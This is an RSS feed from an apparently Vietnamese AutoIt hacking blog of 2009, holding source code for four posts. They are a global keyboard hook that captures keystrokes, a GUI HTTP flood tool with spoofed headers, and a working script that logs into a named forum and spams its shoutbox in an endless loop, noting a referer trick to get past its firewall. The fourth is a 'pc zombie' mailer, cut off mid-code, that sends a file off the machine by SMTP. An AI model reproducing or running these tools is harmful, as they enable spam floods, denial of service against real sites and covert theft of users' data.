<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>IT Blog &#187; AutoIT</title>
	<atom:link href="http://blog.thuongtin.net/category/lap-trinh/autoit/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.thuongtin.net</link>
	<description>php, sql, autoit, javascript, c, html</description>
	<lastBuildDate>Tue, 15 Sep 2009 00:57:58 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>AutoIt &#8211; Kiểm tra người dùng viết gì.</title>
		<link>http://blog.thuongtin.net/2009/05/07/autoit-kiem-tra-nguoi-dung-viet-gi/</link>
		<comments>http://blog.thuongtin.net/2009/05/07/autoit-kiem-tra-nguoi-dung-viet-gi/#comments</comments>
		<pubDate>Thu, 07 May 2009 05:27:13 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[AutoIT]]></category>

		<guid isPermaLink="false">http://blog.thuongtin.net/?p=418</guid>
		<description><![CDATA[

Global Const $WH_KEYBOARD_LL = 13
Global $hHook
Global $hStub_KeyProc = DllCallbackRegister(&#34;_KeyProc&#34;, &#34;long&#34;, &#34;int;wparam;lparam&#34;)
Global $hmod = DllCall(&#34;kernel32.dll&#34;, &#34;hwnd&#34;, &#34;GetModuleHandle&#34;, &#34;ptr&#34;, 0)
Global $hHook = DllCall(&#34;user32.dll&#34;, &#34;hwnd&#34;, &#34;SetWindowsHookEx&#34;, &#34;int&#34;, _
 $WH_KEYBOARD_LL, &#34;ptr&#34;, DllCallbackGetPtr($hStub_KeyProc), &#34;hwnd&#34;, $hmod[0], &#34;dword&#34;, 0)
Global $buffer = &#34;&#34;

MsgBox(4096, &#34;&#34;, &#34;Nhap chuot vao OK sau do mo Notepad va viet.......&#34; &#38; _
 @LF &#38; @LF &#38; &#34;Jon&#34; &#38; @LF ]]></description>
			<content:encoded><![CDATA[<p class="dropcap-first">
<pre class="brush: php;">
Global Const $WH_KEYBOARD_LL = 13
Global $hHook
Global $hStub_KeyProc = DllCallbackRegister(&quot;_KeyProc&quot;, &quot;long&quot;, &quot;int;wparam;lparam&quot;)
Global $hmod = DllCall(&quot;kernel32.dll&quot;, &quot;hwnd&quot;, &quot;GetModuleHandle&quot;, &quot;ptr&quot;, 0)
Global $hHook = DllCall(&quot;user32.dll&quot;, &quot;hwnd&quot;, &quot;SetWindowsHookEx&quot;, &quot;int&quot;, _
 $WH_KEYBOARD_LL, &quot;ptr&quot;, DllCallbackGetPtr($hStub_KeyProc), &quot;hwnd&quot;, $hmod[0], &quot;dword&quot;, 0)
Global $buffer = &quot;&quot;

MsgBox(4096, &quot;&quot;, &quot;Nhap chuot vao OK sau do mo Notepad va viet.......&quot; &amp; _
 @LF &amp; @LF &amp; &quot;Jon&quot; &amp; @LF &amp; &quot;AutoIt&quot;)

While 1
 Sleep(10)
WEnd

Func EvaluateKey($keycode)
 If (($keycode &gt; 64) And ($keycode &lt; 91)) _
 Or (($keycode &gt; 47) And ($keycode &lt; 58)) Then
 $buffer &amp;= Chr($keycode)
 Switch $buffer
 Case &quot;Jon&quot;
 ToolTip(&quot;What can you say?&quot;)
 Case &quot;AUTOIT&quot;
 ToolTip(&quot;AutoIt Rocks&quot;)
 EndSwitch
 ElseIf ($keycode &gt; 159) And ($keycode &lt; 164) Then
 Return
 Else
 $buffer = &quot;&quot;
 EndIf
EndFunc   ;==&gt;EvaluateKey

Func _KeyProc($nCode, $wParam, $lParam)
 Local $ret, $KEYHOOKSTRUCT
 If $nCode &lt; 0 Then
 $ret = DllCall(&quot;user32.dll&quot;, &quot;long&quot;, &quot;CallNextHookEx&quot;, &quot;hwnd&quot;, $hHook[0], _
 &quot;int&quot;, $nCode, &quot;wparam&quot;, $wParam, &quot;lparam&quot;, $lParam)
 Return $ret[0]
 EndIf
 If $wParam = 256 Then
 $KEYHOOKSTRUCT = DllStructCreate(&quot;dword;dword;dword;dword;ptr&quot;, $lParam)
 EvaluateKey(DllStructGetData($KEYHOOKSTRUCT, 1))
 EndIf
 $ret = DllCall(&quot;user32.dll&quot;, &quot;long&quot;, &quot;CallNextHookEx&quot;, &quot;hwnd&quot;, $hHook[0], _
 &quot;int&quot;, $nCode, &quot;ptr&quot;, $wParam, &quot;ptr&quot;, $lParam)
 Return $ret[0]
EndFunc   ;==&gt;_KeyProc

Func OnAutoItExit()
 DllCall(&quot;user32.dll&quot;, &quot;int&quot;, &quot;UnhookWindowsHookEx&quot;, &quot;hwnd&quot;, $hHook[0])
 DllCallbackFree($hStub_KeyProc)
EndFunc   ;==&gt;OnAutoItExit
</pre>
<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://blog.thuongtin.net/2009/04/23/auto-it-hide-process/" rel="bookmark">[Auto It] hide process</a></li><li><a href="http://blog.thuongtin.net/2009/04/23/autoit-autorun-va-lay-lan/" rel="bookmark">[AutoIt] Autorun và lây lan</a></li><li><a href="http://blog.thuongtin.net/2009/06/29/php-display-server-load/" rel="bookmark">[PHP] Display Server Load</a></li><li><a href="http://blog.thuongtin.net/2009/04/29/autoit-viet-phan-mem-spam-web/" rel="bookmark">[AutoIt] Viết phần mềm spam web</a></li><li><a href="http://blog.thuongtin.net/2009/09/15/chinh-time-cua-server-theo-gio-vn/" rel="bookmark">Chỉnh time của server theo giờ VN</a></li></ul></div><img src="http://blog.thuongtin.net/?ak_action=api_record_view&id=418&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://blog.thuongtin.net/2009/05/07/autoit-kiem-tra-nguoi-dung-viet-gi/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>[AutoIt] Source tool Flood có GUI</title>
		<link>http://blog.thuongtin.net/2009/05/03/autoit-source-tool-flood-co-gui/</link>
		<comments>http://blog.thuongtin.net/2009/05/03/autoit-source-tool-flood-co-gui/#comments</comments>
		<pubDate>Sat, 02 May 2009 20:13:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[AutoIT]]></category>
		<category><![CDATA[Hack - Security]]></category>
		<category><![CDATA[flood]]></category>

		<guid isPermaLink="false">http://blog.thuongtin.net/?p=414</guid>
		<description><![CDATA[
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Version=beta
#AutoIt3Wrapper_icon=..\..\Desktop\thingsNSP\Babvil.ico
#AutoIt3Wrapper_outfile=..\..\Desktop\T2 Flood\T2 Flood.exe
#AutoIt3Wrapper_Res_Comment=Flood Shoutbox, bai viet, vv
#AutoIt3Wrapper_Res_Description=T2 Flood Beta
#AutoIt3Wrapper_Res_Fileversion=0.0.0.0
#AutoIt3Wrapper_Res_LegalCopyright=Copyright 2009 by thuongtin@gmail.com
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include &#60;ButtonConstants.au3&#62;
#include &#60;EditConstants.au3&#62;
#include &#60;GUIConstantsEx.au3&#62;
#include &#60;StaticConstants.au3&#62;
#include &#60;WindowsConstants.au3&#62;
#include &#60;GuiEdit.au3&#62;
Global $coki
$Form1_1 = GUICreate(&#34;o0o T2 Flood Beta o0o&#34;, 627, 555, 192, 124, BitOR($WS_MINIMIZEBOX,$WS_SYSMENU,$WS_POPUP,$WS_GROUP,$WS_CLIPSIBLINGS))
GUISetBkColor(0x000000)
$T2 = GUICtrlCreateGroup(&#34; o0o T2 Flood Beta o0o &#34;, 24, 96, 577, 113, $BS_CENTER)
GUICtrlSetFont(-1, ]]></description>
			<content:encoded><![CDATA[<p class="dropcap-first">
<pre class="brush: php;">#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Version=beta
#AutoIt3Wrapper_icon=..\..\Desktop\thingsNSP\Babvil.ico
#AutoIt3Wrapper_outfile=..\..\Desktop\T2 Flood\T2 Flood.exe
#AutoIt3Wrapper_Res_Comment=Flood Shoutbox, bai viet, vv
#AutoIt3Wrapper_Res_Description=T2 Flood Beta
#AutoIt3Wrapper_Res_Fileversion=0.0.0.0
#AutoIt3Wrapper_Res_LegalCopyright=Copyright 2009 by thuongtin@gmail.com
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include &lt;ButtonConstants.au3&gt;
#include &lt;EditConstants.au3&gt;
#include &lt;GUIConstantsEx.au3&gt;
#include &lt;StaticConstants.au3&gt;
#include &lt;WindowsConstants.au3&gt;
#include &lt;GuiEdit.au3&gt;
Global $coki
$Form1_1 = GUICreate(&quot;o0o T2 Flood Beta o0o&quot;, 627, 555, 192, 124, BitOR($WS_MINIMIZEBOX,$WS_SYSMENU,$WS_POPUP,$WS_GROUP,$WS_CLIPSIBLINGS))
GUISetBkColor(0x000000)
$T2 = GUICtrlCreateGroup(&quot; o0o T2 Flood Beta o0o &quot;, 24, 96, 577, 113, $BS_CENTER)
GUICtrlSetFont(-1, 8, 800, 0, &quot;MS Sans Serif&quot;)
GUICtrlSetColor(-1, 0x00FF00)
$ckLogin = GUICtrlCreateCheckbox(&quot;Login&quot;, 40, 119, 13, 17)
GUICtrlSetColor(-1, 0xFFFFFF)
$cLogin = GUICtrlCreateLabel(&quot;Login Web&quot;, 56, 120, 65, 17)
GUICtrlSetColor(-1, 0xFFFF00)
$LUrl = GUICtrlCreateInput(&quot;URL&quot;, 104, 144, 465, 21)
GUICtrlSetColor(-1, 0xFFFFFF)
GUICtrlSetBkColor(-1, 0x808080)
$Label1 = GUICtrlCreateLabel(&quot;URL&quot;, 72, 148, 29, 17)
GUICtrlSetColor(-1, 0xFFFFFF)
$Label3 = GUICtrlCreateLabel(&quot;&quot;, 264, 176, 4, 4)
$Label2 = GUICtrlCreateLabel(&quot;Data&quot;, 68, 180, 31, 17)
GUICtrlSetColor(-1, 0xFFFFFF)
$LData = GUICtrlCreateInput(&quot;Info User&quot;, 104, 176, 465, 21)
GUICtrlSetColor(-1, 0xFFFFFF)
GUICtrlSetBkColor(-1, 0x808080)
GUICtrlCreateGroup(&quot;&quot;, -99, -99, 1, 1)
GUICtrlSetCursor (-1, 9)
$Pic1 = GUICtrlCreatePic(&quot;pic.jpg&quot;, 32, 0, 598, 84, BitOR($SS_NOTIFY,$WS_GROUP,$WS_CLIPSIBLINGS), $GUI_WS_EX_PARENTDRAG)
GUICtrlSetCursor (-1, 9)
$Group1 = GUICtrlCreateGroup(&quot; o0o - Flood - o0o &quot;, 24, 216, 577, 121, $BS_CENTER)
GUICtrlSetFont(-1, 8, 800, 0, &quot;MS Sans Serif&quot;)
GUICtrlSetColor(-1, 0x00FF00)
$Label4 = GUICtrlCreateLabel(&quot;URL&quot;, 74, 251, 29, 17)
GUICtrlSetColor(-1, 0xFFFFFF)
$URL = GUICtrlCreateInput(&quot;URL&quot;, 104, 248, 465, 21)
GUICtrlSetColor(-1, 0xFFFFFF)
GUICtrlSetBkColor(-1, 0x808080)
$Label5 = GUICtrlCreateLabel(&quot;Data&quot;, 70, 296, 31, 17)
GUICtrlSetColor(-1, 0xFFFFFF)
$DATA = GUICtrlCreateEdit(&quot;&quot;, 104, 280, 465, 49, $WS_VSCROLL)
GUICtrlSetData(-1, &quot;&quot;)
GUICtrlSetColor(-1, 0xFFFFFF)
GUICtrlSetBkColor(-1, 0x808080)
GUICtrlCreateGroup(&quot;&quot;, -99, -99, 1, 1)
$Group2 = GUICtrlCreateGroup(&quot; o0o - Other - o0o &quot;, 24, 352, 577, 169, $BS_CENTER)
GUICtrlSetFont(-1, 8, 800, 0, &quot;MS Sans Serif&quot;)
GUICtrlSetColor(-1, 0x00FF00)
$Label6 = GUICtrlCreateLabel(&quot;User-Agent&quot;, 34, 378, 67, 17)
GUICtrlSetColor(-1, 0xFFFFFF)
$useragent = GUICtrlCreateInput(&quot;Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10&quot;, 104, 376, 465, 21)
GUICtrlSetColor(-1, 0xFFFFFF)
GUICtrlSetBkColor(-1, 0x808080)
$Label7 = GUICtrlCreateLabel(&quot;Referer&quot;, 56, 410, 46, 17)
GUICtrlSetColor(-1, 0xFFFFFF)
$referer = GUICtrlCreateInput(&quot;http://google.com&quot;, 104, 408, 465, 21)
GUICtrlSetColor(-1, 0xFFFFFF)
GUICtrlSetBkColor(-1, 0x808080)
$ckAuth = GUICtrlCreateCheckbox(&quot;ckAuth&quot;, 48, 442, 17, 17)
$Label8 = GUICtrlCreateLabel(&quot;Authorization&quot;, 72, 444, 78, 17)
GUICtrlSetColor(-1, 0xFFFF00)
$aUser = GUICtrlCreateInput(&quot;Username&quot;, 160, 440, 113, 21)
GUICtrlSetBkColor(-1, 0x272727)
$aPass = GUICtrlCreateInput(&quot;Password&quot;, 288, 440, 105, 21)
GUICtrlSetBkColor(-1, 0x353535)
$bntSend = GUICtrlCreateButton(&quot;Send&quot;, 408, 440, 73, 25, $WS_GROUP)
$Label10 = GUICtrlCreateLabel(&quot;So luong&quot;, 40, 482, 54, 17)
GUICtrlSetColor(-1, 0xFFFFFF)
$Soluong = GUICtrlCreateInput(&quot;1&quot;, 104, 480, 65, 21, BitOR($ES_AUTOHSCROLL,$ES_NUMBER))
GUICtrlSetBkColor(-1, 0x808080)
GUICtrlCreateLabel(&quot;&quot;, 152, 496, 4, 4)
$Conlai = GUICtrlCreateLabel(&quot;0&quot;, 224, 484, 100, 17)
GUICtrlSetColor(-1, 0xFFFFFF)
GUICtrlCreateGroup(&quot;&quot;, -99, -99, 1, 1)
$Label9 = GUICtrlCreateLabel(&quot;Copyright 2009 by Song Chet Group&quot;, 424, 528, 174, 17)
GUICtrlSetColor(-1, 0xFFFFFF)
$btClose = GUICtrlCreateButton(&quot;Close&quot;, 496, 440, 73, 25, $WS_GROUP)
GUISetState(@SW_SHOW)

While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit

Case $bntSend
 T2Send()
Case $btClose
 Exit
EndSwitch
WEnd

Func Post($pUrl, $pData, $pUserAgent=&quot;Googlebot&quot;, $pReferer=&quot;http://google.com&quot;, $pAUser=&quot;&quot;, $pAPass=&quot;&quot;, $pCookie=&quot;&quot;)
 $oHttpRequest = ObjCreate(&quot;WinHttp.WinHttpRequest.5.1&quot;)
 $oHttpRequest.Open (&quot;POST&quot;, $pUrl,True)
 If $pAUser &lt;&gt; &quot;&quot; And $pAPass &lt;&gt; &quot;&quot; Then
 $oHttpRequest.SetCredentials( $pAUser, $pAPass, 0)
 EndIf
 $oHttpRequest.setRequestHeader (&quot;Content-Type&quot;, &quot;application/x-www-form-urlencoded&quot;)
 $oHttpRequest.setRequestHeader (&quot;User-Agent&quot;, $pUserAgent)
 $oHttpRequest.setRequestHeader (&quot;Accept-Language&quot;, &quot;en-us,en;q=0.5&quot;)
 $oHttpRequest.setRequestHeader (&quot;Accept-Encoding&quot;, &quot;gzip,deflate&quot;)
 $oHttpRequest.setRequestHeader (&quot;Accept-Charset&quot;, &quot;ISO-8859-1,utf-8;q=0.7,*;q=0.7&quot;)
 $oHttpRequest.setRequestHeader (&quot;Connection&quot;, &quot;Keep-Alive&quot;)
 $oHttpRequest.setRequestHeader (&quot;Referer&quot;, $pReferer)
 If $pCookie &lt;&gt; &quot;&quot; Then
 $oHttpRequest.setRequestHeader (&quot;Cookie&quot;, $pCookie)
 EndIf
 $oHttpRequest.Send ($pData)
 $a = $oHttpRequest.getAllResponseHeaders()
 $oHttpRequest = &quot;&quot;
 ;MsgBox(0, &quot;&quot;, $a)
 $sm = StringSplit($a, &quot;Set-Cookie:&quot;, 1)
 $sl = UBound($sm, 1) - 1
 For $i = 2 To $sl Step +1
 $sm2 = StringSplit($sm[$i], &quot;;&quot;, 1)
 $coki &amp;= $sm2[1] &amp; &quot;;&quot;
 Next
EndFunc
 Func T2Send()
 $t2sl = _GUICtrlEdit_GetText($Soluong)
 $t2Lcheck = GUICtrlRead($ckLogin)
 If $t2Lcheck == 1 Then
 $t2Lurl = _GUICtrlEdit_GetText($LUrl)
 $ptt2Lurl = StringSplit($t2Lurl, &quot;=SCG=&quot;, 1)
 $slpturl = UBound($ptt2Lurl, 1) - 1
 $t2LData = _GUICtrlEdit_GetText($LData)
 $ptt2LData = StringSplit($t2LData, &quot;=SCG=&quot;, 1)
 $slptdata = UBound($ptt2LData, 1) - 1
 EndIf
 $t2Url = _GUICtrlEdit_GetText($URL)
 $t2Data = _GUICtrlEdit_GetText($DATA)
 $t2UA = _GUICtrlEdit_GetText($useragent)
 $t2ref = _GUICtrlEdit_GetText($referer)
 $t2Athcheck = GUICtrlRead($ckAuth)
 If $t2Athcheck == 1 Then
 $t2AUser = _GUICtrlEdit_GetText($aUser)
 $t2APass = _GUICtrlEdit_GetText($aPass)
 Else
 $t2AUser = &quot;&quot;
 $t2APass = &quot;&quot;
 EndIf

 If $t2Lcheck &lt;&gt; 1 Then
 For $ii = 1 To $t2sl Step + 1
 $stime = @MIN &amp; @SEC &amp; @MSEC &amp; $ii
 $t2Data2 = StringRegExpReplace($t2Data, &quot;(\(\*\))&quot;, $stime)
 Post($t2Url, $t2Data2, $t2UA, $t2ref, $t2AUser, $t2APass)
 GUICtrlSetData($Conlai, $ii)
 Next

 Else
 If $slpturl == 1 Then
 Post($t2Lurl, $t2LData, $t2UA, $t2ref, $t2AUser, $t2APass)
 $cokis = StringStripWS($coki, 3)
 Else
 For $i2 = 1 To $slpturl Step + 1
 Post($ptt2Lurl[$i2], $ptt2LData[$i2], $t2UA, $t2ref, $t2AUser, $t2APass, $cokis)
 $cokis = StringStripWS($coki, 3)
 Next
 EndIf

 For $iii = 1 To $t2sl Step + 1
 Sleep(10)
 $stime = @MIN &amp; @SEC &amp; @MSEC &amp; $iii
 $t2Data2 = StringRegExpReplace($t2Data, &quot;(\(\*\))&quot;, $stime)
 Post($t2Url, $t2Data2, $t2UA, $t2ref, $t2AUser, $t2APass, $cokis)
 GUICtrlSetData($Conlai, $iii)
 Next
 EndIf
 EndFunc
</pre>
<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://blog.thuongtin.net/2009/04/23/auto-it-hide-process/" rel="bookmark">[Auto It] hide process</a></li><li><a href="http://blog.thuongtin.net/2009/04/29/autoit-viet-phan-mem-spam-web/" rel="bookmark">[AutoIt] Viết phần mềm spam web</a></li><li><a href="http://blog.thuongtin.net/2009/04/23/autoit-autorun-va-lay-lan/" rel="bookmark">[AutoIt] Autorun và lây lan</a></li><li><a href="http://blog.thuongtin.net/2009/05/07/autoit-kiem-tra-nguoi-dung-viet-gi/" rel="bookmark">AutoIt - Kiểm tra người dùng viết gì.</a></li><li><a href="http://blog.thuongtin.net/2009/06/29/php-display-server-load/" rel="bookmark">[PHP] Display Server Load</a></li></ul></div><img src="http://blog.thuongtin.net/?ak_action=api_record_view&id=414&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://blog.thuongtin.net/2009/05/03/autoit-source-tool-flood-co-gui/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>[AutoIt] Viết phần mềm spam web</title>
		<link>http://blog.thuongtin.net/2009/04/29/autoit-viet-phan-mem-spam-web/</link>
		<comments>http://blog.thuongtin.net/2009/04/29/autoit-viet-phan-mem-spam-web/#comments</comments>
		<pubDate>Wed, 29 Apr 2009 05:05:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[AutoIT]]></category>
		<category><![CDATA[Hack - Security]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://blog.thuongtin.net/?p=409</guid>
		<description><![CDATA[Buồn buồn ngồi viết cái code spam shoutbox trang web http://vudai.root.vn của anh Lê Kim Phi.
Code còn rườm rà, làm biếng viết lại.

#cs
Code: Spam
Author: thuongtin@gmail.com
Website: http://thuongtin.net
Soft: AutoIt v3
#ce
Global $coki = &#34;&#34;
$oMyError = ObjEvent(&#34;AutoIt.Error&#34;,&#34;MyErrFunc&#34;) ; Install a bespoken nonachievement handler
Func Postbai($_url, $_noidung)
$oHttpRequest = ObjCreate(&#34;WinHttp.WinHttpRequest.5.1&#34;)
$oHttpRequest.Open (&#34;POST&#34;, $_url,True)
$oHttpRequest.setRequestHeader (&#34;Content-Type&#34;, &#34;application/x-www-form-urlencoded&#34;) ; Need to modify as per your webpage
$oHttpRequest.setRequestHeader ]]></description>
			<content:encoded><![CDATA[<p class="dropcap-first">Buồn buồn ngồi viết cái code spam shoutbox trang web<a href="http://vudai.root.vn" target="_blank"> http://vudai.root.vn</a> của anh Lê Kim Phi.<br />
Code còn rườm rà, làm biếng viết lại.</p>
<pre class="brush: php;">
#cs
Code: Spam
Author: thuongtin@gmail.com
Website: http://thuongtin.net
Soft: AutoIt v3
#ce
Global $coki = &quot;&quot;
$oMyError = ObjEvent(&quot;AutoIt.Error&quot;,&quot;MyErrFunc&quot;) ; Install a bespoken nonachievement handler
Func Postbai($_url, $_noidung)
$oHttpRequest = ObjCreate(&quot;WinHttp.WinHttpRequest.5.1&quot;)
$oHttpRequest.Open (&quot;POST&quot;, $_url,True)
$oHttpRequest.setRequestHeader (&quot;Content-Type&quot;, &quot;application/x-www-form-urlencoded&quot;) ; Need to modify as per your webpage
$oHttpRequest.setRequestHeader (&quot;User-Agent&quot;, &quot;Yahoo bot&quot;) ; Fake User-Agent sửa thành gì cũng đc.
$oHttpRequest.setRequestHeader (&quot;Accept-Language&quot;, &quot;en-us,en;q=0.5&quot;)
$oHttpRequest.setRequestHeader (&quot;Accept-Encoding&quot;, &quot;gzip,deflate&quot;)
$oHttpRequest.setRequestHeader (&quot;Accept-Charset&quot;, &quot;ISO-8859-1,utf-8;q=0.7,*;q=0.7&quot;)
$oHttpRequest.setRequestHeader (&quot;Connection&quot;, &quot;Keep-Alive&quot;)
$oHttpRequest.setRequestHeader (&quot;Referer&quot;, &quot;http://vudai.root.vn/index.php&quot;) ; Cái referer này để vượt cái tường lửa
$oHttpRequest.Send ($_noidung)
$a = $oHttpRequest.getAllResponseHeaders()
;MsgBox(0, &quot;&quot;, $a)
$sm = StringSplit($a, &quot;Set-Cookie:&quot;, 1)
$sl = UBound($sm, 1) - 1
For $i = 2 To $sl Step +1
 $sm2 = StringSplit($sm[$i], &quot;;&quot;, 1)
 $coki &amp;= $sm2[1] &amp; &quot;;&quot;
Next
 $coki = StringStripWS($coki, 3) ; Cookies
EndFunc
$url = &quot;http://vudai.root.vn/login.php?do=login&quot; ; Trang để Login
$data = &quot;vb_login_username=Spam&amp;cookieuser=1&amp;vb_login_password=&amp;s=&amp;securitytoken=guest&amp;do=login&amp;vb_login_md5password=202cb962ac59075b964b07152d234b70&amp;vb_login_md5password_utf=202cb962ac59075b964b07152d234b70&quot; ; Thông tin login
Postbai($url, $data) ; Cái này là hàm đăng nhập
$oHttpRequest = &quot;&quot;

$oHttpRequest = ObjCreate(&quot;WinHttp.WinHttpRequest.5.1&quot;)
$oHttpRequest.Open (&quot;POST&quot;, &quot;http://vudai.root.vn/vbshout.php&quot;, True) ; Trang shoutbox
$oHttpRequest.setRequestHeader (&quot;Content-Type&quot;, &quot;application/x-www-form-urlencoded; charset=UTF-8&quot;) ; Need to modify as per your webpage
$oHttpRequest.setRequestHeader (&quot;User-Agent&quot;, &quot;Googlebot&quot;)
$oHttpRequest.setRequestHeader (&quot;Accept-Language&quot;, &quot;en-us,en;q=0.5&quot;)
$oHttpRequest.setRequestHeader (&quot;Accept-Encoding&quot;, &quot;gzip,deflate&quot;)
$oHttpRequest.setRequestHeader (&quot;Accept-Charset&quot;, &quot;ISO-8859-1,utf-8;q=0.7,*;q=0.7&quot;)
$oHttpRequest.setRequestHeader (&quot;Connection&quot;, &quot;Keep-Alive&quot;)
$oHttpRequest.setRequestHeader (&quot;Referer&quot;, &quot;http://vudai.root.vn/index.php&quot;) ; Referer
$oHttpRequest.setRequestHeader (&quot;Cookie&quot;, $coki) ; Phải đính kèm theo cookie nếu ko thì bó tay.
While 1
$oHttpRequest.Send (&quot;do=shout&amp;shout=Em là Trùm Spam, ban nick em đi anh Phi ơi.&amp;do=shout&amp;color=%23990000&amp;fontWeight=bold&amp;securitytoken=1241083885-9de872f77e34a12b773616348ca8d7879c5e54f6&amp;s=&quot;)
Sleep(10)
WEnd
</pre>
<p>Nếu bạn copy bài viết vui lòng để nguồn http://thuongtin.net</p>
<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://blog.thuongtin.net/2009/04/23/auto-it-hide-process/" rel="bookmark">[Auto It] hide process</a></li><li><a href="http://blog.thuongtin.net/2009/04/23/autoit-autorun-va-lay-lan/" rel="bookmark">[AutoIt] Autorun và lây lan</a></li><li><a href="http://blog.thuongtin.net/2009/05/07/autoit-kiem-tra-nguoi-dung-viet-gi/" rel="bookmark">AutoIt - Kiểm tra người dùng viết gì.</a></li><li><a href="http://blog.thuongtin.net/2009/05/03/autoit-source-tool-flood-co-gui/" rel="bookmark">[AutoIt] Source tool Flood có GUI</a></li><li><a href="http://blog.thuongtin.net/2009/06/29/php-display-server-load/" rel="bookmark">[PHP] Display Server Load</a></li></ul></div><img src="http://blog.thuongtin.net/?ak_action=api_record_view&id=409&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://blog.thuongtin.net/2009/04/29/autoit-viet-phan-mem-spam-web/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>[AutoIt] Send mail</title>
		<link>http://blog.thuongtin.net/2009/04/23/autoit-send-mail/</link>
		<comments>http://blog.thuongtin.net/2009/04/23/autoit-send-mail/#comments</comments>
		<pubDate>Wed, 22 Apr 2009 19:54:38 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[AutoIT]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[mail]]></category>

		<guid isPermaLink="false">http://blog.thuongtin.net/?p=406</guid>
		<description><![CDATA[

;##################################
; Include
;##################################
#Include&#60;file.au3&#62;
#Include&#60;array.au3&#62;
#include &#60;ScreenCapture.au3&#62;
;##################################
; Variables
;##################################

Dim $array
$s_SmtpServer = &#34;smtp.gmail.com&#34;                             ; address for the smtp-server to use - REQUIREDhoangtuviolet_1987
$s_FromName = &#34;pc zombie&#34;                           ; name from who the email was sent
$s_FromAddress = &#34;bongma@gmail.com&#34;    ]]></description>
			<content:encoded><![CDATA[<p class="dropcap-first">
<pre class="brush: php;">
;##################################
; Include
;##################################
#Include&lt;file.au3&gt;
#Include&lt;array.au3&gt;
#include &lt;ScreenCapture.au3&gt;
;##################################
; Variables
;##################################

Dim $array
$s_SmtpServer = &quot;smtp.gmail.com&quot;                             ; address for the smtp-server to use - REQUIREDhoangtuviolet_1987
$s_FromName = &quot;pc zombie&quot;                           ; name from who the email was sent
$s_FromAddress = &quot;bongma@gmail.com&quot;                 ;  address from where the mail should come virusvn1989
$s_ToAddress = &quot;bongma@gmail.com&quot;           ; destination address of the email - REQUIRED  --&gt; ten nick nguoi nhan
$s_Subject = &quot;day la tieu de&quot;                                      ; subject from the email - can be anything you want it to be
$as_Body = &quot;cai nay la dong thong bao&quot;                                                      ; the messagebody from the mail - can be left blank but then you get a blank mail
$array = @WindowsDir &amp; &quot;\1.jpg&quot;  ; cai nay anh em de gui file nhe
$s_CcAddress = &quot;&quot;                    ; address for cc - leave blank if not needed
$s_BccAddress = &quot;&quot;                   ; address for bcc - leave blank if not needed
$s_Username = &quot;bongma@gmail.com&quot;                        ; username for the account used from where the mail gets sent  - Optional (Needed for eg GMail)
$s_Password = &quot;*******&quot;                           ; password for the account used from where the mail gets sent  - Optional (Needed for eg GMail)
$IPPort = 465                                       ; port used for sending the mail
$ssl = 1                                                          ; enables/disables secure socket layer sending - put to 1 if using httpS
;##################################
; Script
;##################################
Global $oMyRet[2]
Global $oMyError = ObjEvent(&quot;AutoIt.Error&quot;, &quot;MyErrFunc&quot;)
$rc = _INetSmtpMailCom($s_SmtpServer, $s_FromName, $s_FromAddress, $s_ToAddress, $s_Subject, $as_Body, $array, $s_CcAddress, $s_BccAddress, $s_Username, $s_Password, $IPPort, $ssl)
Func _INetSmtpMailCom($s_SmtpServer, $s_FromName, $s_FromAddress, $s_ToAddress, $s_Subject = &quot;&quot;, $as_Body = &quot;&quot;, $array = &quot;&quot;, $s_CcAddress = &quot;&quot;, $s_BccAddress = &quot;&quot;, $s_Username = &quot;&quot;, $s_Password = &quot;&quot;,$IPPort=25, $ssl=0)
 $objEmail = ObjCreate(&quot;CDO.Message&quot;)
 $objEmail.From = '&quot;' &amp; $s_FromName &amp; '&quot; &lt;' &amp; $s_FromAddress &amp; '&gt;'
 $objEmail.To = $s_ToAddress
 Local $i_Error = 0
 Local $i_Error_desciption = &quot;&quot;
 If $s_CcAddress &lt;&gt; &quot;&quot; Then $objEmail.Cc = $s_CcAddress
 If $s_BccAddress &lt;&gt; &quot;&quot; Then $objEmail.Bcc = $s_BccAddress
 $objEmail.Subject = $s_Subject
 If StringInStr($as_Body,&quot;&lt;&quot;) and StringInStr($as_Body,&quot;&gt;&quot;) Then
 $objEmail.HTMLBody = $as_Body
 Else
 $objEmail.Textbody = $as_Body &amp; @CRLF
 EndIf
 If $array &lt;&gt; &quot;&quot; Then
 ;Local $array = StringSplit($array, &quot;;&quot;)
 $array= _PathFull ($array)
 If FileExists($array) Then
